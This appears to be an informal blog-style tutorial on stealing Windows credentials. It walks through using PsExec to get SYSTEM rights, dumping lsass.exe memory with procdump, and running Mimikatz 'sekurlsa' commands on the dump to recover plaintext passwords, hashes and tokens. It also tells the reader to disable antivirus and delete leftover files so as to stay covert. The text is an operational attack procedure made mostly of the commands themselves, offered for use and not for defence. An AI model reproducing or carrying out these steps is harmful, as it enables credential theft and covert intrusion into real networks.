Surprisingly Microsoft supplies you the tools that allow you to dump the lsass.exe and then you can use Mimikatz on the dump file to get a shit load of goodies. Tokens, Plaintext cached domain credentials, etc.
Copy both the Psexec and Procdump zip files to the computer that you want to dump the lsass from and extract the contents of the zip file.
open up command prompt and move to the folder where you extracted the Psexec zip file.
Run the command below to escalate from local admin to NT Authority.
PSEXEC -i -s -d CMD
you can check that you are now NT Authority by doing a whoami and you should get a output like this.
so as NT Authority navigate to where you extracted Procdump and run the command below.
procdump -ma lsass.exe lsassdump
copy the lsassdump.dmp found in your procdump directory back to your pc ready to run Mimikatz on it.
If your trying to be a little covert, delete any directory s and zip files created in the previouse steps..
Download Mimikatz from the authors site .
Extract the contents of the zip file “be careful Anti Virus will pick this up as a virus so disable if needed”.
Type “sekurlsa::Minidump (location of lsassdump.dmp)”
Lastly type “sekurlsa::logonPasswords”
you can get mimikatz to display a log file of all it finds by typing “log”in the mimikatz console first.
and that is it Mimikatz will run through the dump file and within a second or so you will get all the tasty clear text passwords and hashes you required.
have not been able to run mimikatz from a windows 10 PC will investigate…